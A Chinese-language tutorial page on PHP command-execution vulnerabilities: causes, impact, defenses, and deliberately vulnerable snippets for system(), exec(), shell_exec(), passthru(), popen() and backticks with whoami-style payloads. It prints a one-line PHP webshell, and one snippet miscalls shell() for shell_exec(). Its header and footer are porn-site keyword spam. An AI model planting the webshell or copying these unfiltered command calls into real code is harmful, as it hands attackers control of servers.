久久福利_99r_国产日韩在线视频_直接看av的网站_中文欧美日韩_久久一

您的位置:首頁(yè)技術(shù)文章
文章詳情頁(yè)

php網(wǎng)絡(luò)安全中命令執(zhí)行漏洞的產(chǎn)生及本質(zhì)探究

瀏覽:47日期:2022-06-06 15:25:39
目錄
  • 漏洞的產(chǎn)生原因
  • 漏洞的本質(zhì)
  • 涉及到的函數(shù)
  • 命令執(zhí)行漏洞的危害
  • 命令執(zhí)行漏洞的防御
  • 命令執(zhí)行相關(guān)函數(shù)的使用
    • system()
    • exec()
    • shell_exec()
    • passthru()
    • popen()
  • 反引號(hào)

    漏洞的產(chǎn)生原因

    • 代碼層過(guò)濾不嚴(yán)。應(yīng)用程序直接或間接使用了動(dòng)態(tài)執(zhí)行命令的危險(xiǎn)函數(shù),并且這個(gè)函數(shù)的運(yùn)行參數(shù)是可控的
    • 系統(tǒng)的漏洞造成命令注入

    漏洞的本質(zhì)

    應(yīng)用有時(shí)需要調(diào)用一些執(zhí)行系統(tǒng)命令的函數(shù),當(dāng)服務(wù)器沒(méi)有嚴(yán)格過(guò)濾用戶(hù)提供的參數(shù)時(shí),就有可能導(dǎo)致用戶(hù)提交惡意代碼被服務(wù)器執(zhí)行,從而造成命令執(zhí)行漏洞。

    涉及到的函數(shù)

    • 1.system
    • 2.exec()
    • 3.shell_exec()
    • 4.passthru()
    • 5.popen()
    • 6.反引號(hào)

    命令執(zhí)行漏洞的危害

    • 1.繼承Web 服務(wù)器程序權(quán)限(Web用戶(hù)權(quán)限),去執(zhí)行系統(tǒng)命令
    • 2.繼承Web服務(wù)器權(quán)限,讀寫(xiě)文件
    • 3.反彈Shell
    • 4.控制整個(gè)網(wǎng)站
    • 5.控制整個(gè)服務(wù)器

    命令執(zhí)行漏洞的防御

    • 1、盡量少使用執(zhí)行命令函數(shù)或者禁用disable_functions
    • 2、在進(jìn)入執(zhí)行命令的函數(shù)之前,對(duì)參數(shù)進(jìn)行過(guò)濾,對(duì)敏感字符進(jìn)行轉(zhuǎn)義
    • 3、參數(shù)值盡量使用引號(hào)包括,并在拼接前調(diào)用addslashes進(jìn)行轉(zhuǎn)義

    命令執(zhí)行相關(guān)函數(shù)的使用

    system()

    • 說(shuō)明:能夠?qū)⒆址鳛镺S命令執(zhí)行,自帶輸出功能
    • 測(cè)試參考代碼:
    <?php
    if(isset($_GET["cmd"])){
        system($_GET["cmd"]);
    }
    ?>
    payload:?cmd=ipconfig

    exec()

    • 說(shuō)明:能將字符串作為OS命令執(zhí)行,但無(wú)輸出,需要輸出執(zhí)行結(jié)果print。
    • exec() 默認(rèn)只輸出最后一行的數(shù)據(jù)
    • 如果想讓他輸出全部結(jié)果,可以加一個(gè)參數(shù),即exec(ifconfig,$arr); print_r($arr);,如一句話(huà)木馬:<?php exec($_REQUEST[123],$arr);print_r($arr)?>
    • 測(cè)試參考代碼
    <?php
    if(isset($_GET["cmd"])){
        print exec($_GET["cmd"]);
    }
    ?>
    payload:?cmd=whoami

    shell_exec()

    • 說(shuō)明:執(zhí)行命令并以字符串的形式,返回完整的信息,但是函數(shù)無(wú)回顯,需要輸出執(zhí)行結(jié)果。
    • 測(cè)試參考代碼
    <?php
    if(isset($_GET["cmd"])){
        print shell($_GET["cmd"]);
    }
    ?>
    payload:?cmd=whoami

    passthru()

    • 說(shuō)明:執(zhí)行外部命令,與system()類(lèi)似,但是該函數(shù)會(huì)直接將結(jié)果輸出,無(wú)需輸出執(zhí)行。
    • 測(cè)試參考代碼
    <?php
    if(isset($_GET["cmd"])){
        passthru($_GET["cmd"]);
    }
    ?>
    payload:?cmd=whoami

    popen()

    • 說(shuō)明:能夠執(zhí)行OS命令,但是該函數(shù)并不是返回命令結(jié)果,而是返回一個(gè)文件指針
    • 測(cè)試參考代碼
    <?php
    if(isset($_GET["cmd"])){
        $cmd=$_GET["cmd"].">>1.txt";
        popen($cmd,"r");
    }
    ?>
    payload:?cmd=whoami

    反引號(hào)

    • 說(shuō)明:反引號(hào)[``]內(nèi)的字符串,也會(huì)被解析成OS命令
    • 反引號(hào)背后執(zhí)行的代碼其實(shí)是調(diào)用了shell_exec(),所以禁用了shell_exec()同樣反引號(hào)也無(wú)法使用了。
    • 測(cè)試參考代碼
    <?php
    if(isset($_GET["cmd"])){
        $cmd=$_GET["cmd"];
        print `$cmd`;
    }
    ?>
    payload:?cmd=whoami

    到此這篇關(guān)于php網(wǎng)絡(luò)安全中命令執(zhí)行漏洞的產(chǎn)生及本質(zhì)探究的文章就介紹到這了,更多相關(guān)php命令執(zhí)行漏洞內(nèi)容請(qǐng)搜索以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持!

    標(biāo)簽: PHP
    主站蜘蛛池模板: 四虎影院最新网址 | 91在线视频免费观看 | 亚洲精品一区 | 亚洲成人中文字幕 | 久久亚洲一区 | 欧美一级二级三级视频 | 久久久网 | 亚洲欧美日韩另类一区二区 | 精品在线播放 | 在线不卡a资源高清 | 一级久久久久 | 日韩成人影院 | 久久久久亚洲一区二区三区 | 一级一级一级一级毛片 | 日韩在线小视频 | 黄色毛片免费看 | av一区二区三区四区 | 中文字幕二区三区 | 中文在线一区 | 日韩精品久久久 | 亚洲国产高清高潮精品美女 | 国产精品99精品久久免费 | 日韩视频二区 | 日韩在线视频观看 | 日日爱夜夜操 | 天天操天天碰 | 999精品视频 | 欧美一区二区三区久久精品 | 国产区免费观看 | 黄色毛片观看 | 啪一啪操一操 | 欧美日韩精品一区二区三区在线观看 | 久色视频在线观看 | 国产精品高清在线 | 免费看91| 日韩精品在线观看视频 | 日韩欧美在线免费观看 | 黄色高清视频在线观看 | 国产精品毛片久久久久久久 | 亚洲欧美一区二区精品中文字幕 | 久久久久精 |